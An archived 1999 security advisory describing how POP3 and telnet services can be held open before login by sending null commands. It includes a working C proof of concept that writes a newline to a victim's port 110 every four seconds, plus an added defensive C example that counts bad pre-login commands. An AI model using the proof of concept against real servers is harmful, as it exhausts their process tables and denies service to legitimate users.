kki.inactive.connections.txt

1999-08-17T00:00:00
ID PACKETSTORM:12027
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

                                        
                                            `Date: Wed, 28 Apr 1999 13:59:28 +0200  
From: Lukasz Luzar <lluzar@SECURITY.KKI.PL>  
To: BUGTRAQ@netspace.org  
Subject: KKIS.28041999.002.b  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
### ### ### ### ###  
### ### ### ### ###  
###### ###### ###  
### ### ### ### ###  
### ### ### ### ###  
  
S E C U R I T Y  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
KKI Security Team Cracow Commercial Internet  
http://www.security.kki.pl http://www.kki.pl  
mailto:security@security.kki.pl mailto:biuro@kki.pl  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Report title : Flaws in implementations of the mechanisms that prevent parasitic connections from being maintained to many TCP network services.  
Problem found by : Lukasz Luzar (lluzar@security.kki.pl)  
Report created by : Robert Pajak (shadow@security.kki.pl)  
Lukasz Luzar (lluzar@security.kki.pl)  
Report published : 28 April 1999  
Report code : KKIS.28041999.002.b  
Vulnerable programs : qpopper, in.pop3, cucipop, telnetd, ...  
Systems affected : Linux, FreeBSD, Solaris, ...  
Archive : http://www.security.kki.pl/advisories/  
Risk level : low  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
The designers of many popular network services try to build mechanisms that prevent parasitic connections from being maintained to their programs. The usual form of such protection is a timeout that closes inactive connections. But some of those designers forget that a malicious client can frequently send strings full of bad or null commands to the open port of the service, and that this can happen before the connection is authenticated with a login and password. Those programmers should implement an additional mechanism to prevent such situations. A good solution is to keep a counter of bad (or null) commands inside the program.
  
For example, a similar mechanism has been applied in sendmail. This solution is effective and very easy to implement.
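The following is an added example of the server-side counter the advisory recommends; it is not code from the KKI advisory or from any of the named services. It models the pre-authentication (AUTHORIZATION) state of a POP3 server: every line received before login is counted, an empty line or an unknown verb is counted as a bad command, and the connection is dropped once either counter passes a constructed limit. The limits, the struct and function names, and the verb list are assumptions for this example. The server's ordinary idle timeout is still applied by the caller; this counter only closes the hole where a client sends "\n" every few seconds so that the idle timeout never fires.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Constructed limits for this example; a real service would make them
 * configurable. */
#define MAX_BAD_COMMANDS     5   /* empty lines or unknown verbs before login */
#define MAX_PREAUTH_COMMANDS 20  /* any commands at all before login */

enum verdict { KEEP_OPEN = 0, DROP_CONNECTION = 1 };

/* Per-connection counters kept while the client is not yet authenticated. */
struct preauth_state {
    int bad_commands;    /* null or unrecognised commands seen so far */
    int total_commands;  /* every line seen before authentication */
};

/* Verbs a POP3 server accepts in the AUTHORIZATION state (RFC 1939 plus the
 * common CAPA/AUTH extensions). Anything else, and any empty line, counts as
 * a bad command. */
static const char *known_preauth_verbs[] = {
    "USER", "PASS", "APOP", "QUIT", "CAPA", "AUTH"
};

static int is_known_preauth_verb(const char *verb)
{
    size_t i;
    for (i = 0; i < sizeof known_preauth_verbs / sizeof known_preauth_verbs[0]; i++)
        if (strcmp(verb, known_preauth_verbs[i]) == 0)
            return 1;
    return 0;
}

/* Copy the first word of a command line, upper-cased, into verb[]. An empty
 * or whitespace-only line (the advisory's "\n") yields an empty verb. */
static void extract_verb(const char *line, char *verb, size_t verb_size)
{
    size_t n = 0;
    while (*line == ' ' || *line == '\t')
        line++;
    while (*line && !isspace((unsigned char)*line) && n + 1 < verb_size) {
        verb[n++] = (char)toupper((unsigned char)*line);
        line++;
    }
    verb[n] = '\0';
}

/* Account for one pre-authentication command line and decide whether the
 * connection is kept or dropped. */
enum verdict preauth_command(struct preauth_state *st, const char *line)
{
    char verb[16];

    st->total_commands++;
    if (st->total_commands > MAX_PREAUTH_COMMANDS)
        return DROP_CONNECTION;          /* too much traffic without a login */

    extract_verb(line, verb, sizeof verb);
    if (verb[0] == '\0' || !is_known_preauth_verb(verb)) {
        st->bad_commands++;
        if (st->bad_commands >= MAX_BAD_COMMANDS)
            return DROP_CONNECTION;      /* repeated null or bad commands */
    }
    return KEEP_OPEN;
}

/* Feed the same line repeatedly, as the advisory's example.c does, and return
 * the number of the line on which the server drops the connection. */
int lines_until_drop(const char *line)
{
    struct preauth_state st = { 0, 0 };
    int n = 0;
    for (;;) {
        n++;
        if (preauth_command(&st, line) == DROP_CONNECTION)
            return n;
    }
}

int main(void)
{
    printf("empty lines until drop: %d\n", lines_until_drop("\n"));
    printf("CAPA lines until drop:  %d\n", lines_until_drop("CAPA\r\n"));
    return 0;
}
```

With these limits a client that only ever sends newlines is disconnected on its fifth line, and even a client that sends valid pre-login commands is disconnected after twenty of them, so no connection can stay in the unauthenticated state indefinitely. Logging the peer address on each drop would also address the advisory's point that cucipop records nothing about connections that never authenticate.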
  
The lack of this mechanism may be quite threatening, because most of these TCP services run with root privileges, and bounding the number of root processes is not easy when the service has no internal bound. This affects the whole system when the process table is filled, for example by many open connections to the vulnerable TCP service.
  
The worst situation is when the vulnerable service does not log any information about a connection before authentication with login/password. One of the most vulnerable services in this respect is cucipop.
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
The example below shows how to open and maintain a connection which may stay open for an undefined time.
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
--- CUT HERE ---

```c
/*
 * example.c by Lukasz Luzar (lluzar@security.kki.pl)
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>   /* TCP_NODELAY */
#include <arpa/inet.h>

/* victim's address and port of service */
#define ADDR "10.0.0.1"   /* IP in dotted notation */
#define PORT 110          /* e.g. some pop3 */
#define DELAY 4           /* (4 secs.) how often we are sending bad commands */
#define COMMAND "\n"      /* some bad (or null) command */

int main(void)
{
    int sockfd, j, k;
    struct sockaddr_in victim_addr;

    memset(&victim_addr, 0, sizeof(victim_addr));

    victim_addr.sin_family = AF_INET;
    victim_addr.sin_addr.s_addr = inet_addr(ADDR);
    victim_addr.sin_port = htons(PORT);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket");
        exit(1);
    }

    if (connect(sockfd, (struct sockaddr *) &victim_addr, sizeof(victim_addr)) < 0) {
        perror("connect");
        exit(1);
    }

    /* send every "command" at once instead of letting the stack coalesce it */
    k = 1;
    if (setsockopt(sockfd, IPPROTO_TCP, TCP_NODELAY, &k, sizeof(k)) != 0)
        perror("setsockopt");

    j = strlen(COMMAND);

    /* send a null command every DELAY seconds, so the service's inactivity
       timeout never fires and the connection stays open */
    for (;;) {
        if (write(sockfd, COMMAND, j) == -1) {
            perror("write");
            exit(1);
        }
        fprintf(stderr, ".");
        sleep(DELAY);
    }
}
```

--- CUT HERE ---
  
~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Copyright (c) 1999 KKI Security Team, Poland  
All rights reserved.  
  
All questions please address to mailto:security@security.kki.pl  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  